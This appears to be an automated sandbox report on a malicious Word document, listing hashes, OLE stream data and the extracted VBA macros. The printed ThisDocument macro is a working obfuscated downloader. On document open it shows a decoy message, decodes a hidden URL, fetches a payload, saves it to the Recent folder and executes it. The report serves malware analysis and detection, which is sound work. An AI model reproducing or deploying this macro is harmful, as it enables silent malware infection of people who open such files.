MD5:	2858F7DFA6B6B41F350A1F4FCF020333
SHA1:	99839B2A1A9706079D44D9405D7CB2F1111A2EDF
SHA-256:	CD97D9112D21255A5DE8BA3F7DD0628CF0728C656169468794CF6A919645D112
SHA-512:	57C7A4A776D64705FA7CCD1A105DAF2BA3E037C84B351B5903E989F6AB0871FE152034AA0B2A01586250FDA572EEABE58FE4E3E17DAE8EB27141E4F512ABD69C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>.......................7...........:...............6......................................................................................................................................................................................................................................................................................................................................................................................................................................................y.............................bjbj...............................{...{....................................................................................6.......6...........................................................................................................-...f...................................................................'...................................................$...........E...>.........................................................................

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal.dotm, Last Saved By: oplup, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Fri Dec 6 05:13:00 2024, Last Saved Time/Date: Fri Dec 6 05:14:00 2024, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	4.964054445036645
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	yIla7SeJ6r.doc
File size:	48'128 bytes
MD5:	26973056c194b68b10d1c2b9a632a27e
SHA1:	0b61132df948c4d48e81b631bdad91be1080f530
SHA256:	4a58b228b23cdc286d103115b2fb312eedf6741aeada17b242620b6737db1035
SHA512:	72a2120c4e62e91aec8cf5ec14ca42d5088944b4652dd5c69be15640bb3c260a8eb74984659f98d2161671bc4b4da0397542d4e0d24e30518374ff686ed66c2e
SSDEEP:	384:5fFAhRp/6j1dhUsQGlWmxDJzkpiSY5UyCUuCJbnsQfzyK9tujq/z60jAx7:5KhHi3KnCWmHzk7o3JzVip
TLSH:	99232A01B1D2C617F2A545B45ECBCBEA7739BC19AD06424B32E4BF0EBD396B0CA15744
File Content Preview:	........................>.......................7...........:...............6..................................................................................................................................................................................

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "yIla7SeJ6r.doc"

Indicators

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:	admin
Template:	Normal.dotm
Last Saved By:	oplup
Revion Number:	4
Total Edit Time:	60
Create Time:	2024-12-06 05:13:00
Last Saved Time:	2024-12-06 05:14:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	1
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: NewMacros.bas, Stream Size: 918

General
Stream Path:	Macros/VBA/NewMacros
VBA File Name:	NewMacros.bas
Stream Size:	918
Data ASCII:	. . . . . . . . \\ . . . . . . . . . c . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 5c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 63 02 00 00 43 03 00 00 00 00 00 00 01 00 00 00 1c b7 b6 f8 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "NewMacros"
Sub doc()
'
' doc Macro
'
'

End Sub

VBA File Name: ThisDocument.cls, Stream Size: 8816

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	8816
Data ASCII:	. . . . . . . . f . . . . . . . . . m . . . . . . . . . . . . . . . O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i .
Data Raw:	01 16 01 00 01 f0 00 00 00 66 0b 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 6d 0b 00 00 e9 17 00 00 00 00 00 00 01 00 00 00 1c b7 4f ca 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YOnvdf() As Byte
YOnvdf = 0
Call Eeotq
End Function
Function Eeotq() As Currency
Eeotq = 1000000000#
Call ycgftitiou
End Function

    Public Function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI)
        QoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYD = " @#$%^&*()_+|01456789bdghjklmqvwz.,-~AFGHJKMNQRTVWXZ?!23acefinoprstuxyBCDEILOPSUY"
        For w = 1 To Len(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI)
            ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv = InStr(QoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr, Mid(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI, w, 1))
            If ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv > 0 Then
                bWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFU = Mid(cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYD, ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv, 1)
                NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu + bWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFU
            Else
                NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu + Mid(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI, w, 1)
            End If
        Next
        pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu
    End Function
Private Sub Document_Open()
Dim WshShell As Object
Dim JbiIUBSpecialPathTycyt As String
Dim kxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBw As Integer
kxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBw = Chr(50) + Chr(48) + Chr(48)
  
    

    Set WshShell = CreateObject("WScript.Shell")
    JbiIUBSpecialPathTycyt = WshShell.SpecialFolders("Recent")
Dim TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr
Dim nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf
Dim dEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGvb
Dim zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT
Dim xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg
Dim WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf As Integer
Dim lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ
Dim cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHP
WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf = 1

ECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYCh = "Please wait....."
Selection.TypeText (ECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYCh)


Set lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ = CreateObject("microsoft.xmlhttp")
Set xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg = CreateObject("Shell.Application")

zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT = JbiIUBSpecialPathTycyt + pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("\MF.")
lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.Open "get", pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("h://www.m.m/dhw/zgdggwwgggg/dghghwhghgh/bhdh."), False
lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.send
nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf = lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.responseBody
If lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.Status = 200 Then
Set TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr = CreateObject("adodb.stream")
TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Open
TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Type = WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf
TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Write nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf
TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.SaveToFile zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT, WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf + WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf
TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Close
End If
xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg.Open (zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT)
End Sub


Function ycgftitiou() As Double
Call rgdxheg
End Function
Function rgdxheg() As Integer
rgdxheg = 42
Call uvgyjbdeh
End Function
Function uvgyjbdeh() As Long
uvgyjbdeh = uvgyjbdeh
Call Qiotbdok
End Function

Function Qiotbdok() As Single
Qiotbdok = Qiotbdok
Call bdekviniot
End Function
Function bdekviniot() As Date

End Function

Function Vionot() As Currency
Call tiuoty
End Function
Function tiuoty() As Boolean
tiuoty = False
Call Obvitiobb
End Function

Function Obvitiobb() As Single
Call tbjhjzg
End Function


Function tbjhjzg() As Boolean
tbjhjzg = True
Call Yimomnh
End Function

Function Yimomnh() As Double
Yimomnh = nifnfzsg
Call nifnfzsg
End Function


Function nifnfzsg() As Date
nifnfzsg = nil
Call quibvjhv
End Function

Function quibvjhv()

End Function


Function MBFJbdjkbc() As Date
MBFJbdjkbc = 11 / 5 / 2024
End Function
Function RTgdJbdjkbc() As Single
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.235956365095031
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.24406295845382758
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.40764166636467514
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a d m i n . . . . . . . . . . . N o r m a l . d o t m . . . . . . . . . o p l u p . . . . . . . . . . . 4 . . . . . . . . . . . M i c r o s o f t O f f i c e W o r d . . . @ . . . . F # . . . . @
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 1c 01 00 00 0d 00 00 00 01 00 00 00 70 00 00 00 04 00 00 00 78 00 00 00 07 00 00 00 88 00 00 00 08 00 00 00 9c 00 00 00 09 00 00 00 ac 00 00 00 12 00 00 00 b8 00 00 00 0a 00 00 00 d8 00 00 00 0c 00 00 00 e4 00 00 00 0d 00 00 00 f0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6783

General
Stream Path:	1Table
CLSID:
File Type:	data
Stream Size:	6783
Entropy:	5.980355683716292
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: dBase III DBT, version number 0, next free block index 8018, 1st item "\350@\020\350\034\201Q\222~\376\371\347M\354\177\375\353_-|\354\337\377\376w\373\333\247g\177\375\353_\333\357\037}\364\321\354\263\317>\233\275\361\306\033\3732\315O?\375\264\215\373\227\277\374\345\377\306\177\357\275\367Fe"\373n", Stream Size: 8018

General
Stream Path:	Data
CLSID:
File Type:	dBase III DBT, version number 0, next free block index 8018, 1st item "\350@\020\350\034\201Q\222~\376\371\347M\354\177\375\353_-\|\354\337\377\376w\373\333\247g\177\375\353_\333\357\037}\364\321\354\263\317>\233\275\361\306\033\3732\315O?\375\264\215\373\227\277\374\345\377\306\177\357\275\367Fe"\373n"
Stream Size:	8018
Entropy:	7.877706425678382
Base64 Encoded:	True
Data ASCII:	R . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . Y . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . C . . 6 . . . . A . . . . . . . . . . . . . . . . . . . . T . T . T . m . t . s . 1 . 0 . 3 . S . w . i . f . t . . . . . . . . . . . . . b . . . . . . . # x . B & . K . \\ . . . . . . . . D . . . . . / . . n . x . . . # x . B & . K . \\ P N G . . . . . . . . I H D R . . . . . . . . . . . . n . . . . g A M A . . . a . . . . . p H Y s .
Data Raw:	52 1f 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a7 0d 01 0e 59 0a 59 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 5a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 36 00 00 00 04 41 01 00 00 00 05 c1 1e 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 54 00 54 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 491

General
Stream Path:	Macros/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	491
Entropy:	5.186496171485735
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 6 4 4 E A B B 7 E 4 D C D 5 1 C D 5 1 C 9 5 5 C 9 5 5 " . . D P B = " 9 1 9 3 3 D 2 2 5 A 2 2 5 A D D A 6 2 3 5 A 4 F B 5 3 6 7 4 3 C F C 0 C B
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71

General
Stream Path:	Macros/PROJECTwm
CLSID:
File Type:	data
Stream Size:	71
Entropy:	3.3485999524807437
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4795

General
Stream Path:	Macros/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	4795
Entropy:	5.477599138186567
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 94 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 579

General
Stream Path:	Macros/VBA/dir
CLSID:
File Type:	data
Stream Size:	579
Entropy:	6.3396620203061405
Base64 Encoded:	True
Data ASCII:	. ? . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . y e i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * . \\ C . . . . @ c . . . ! O f f i c . g O . f . i . c .
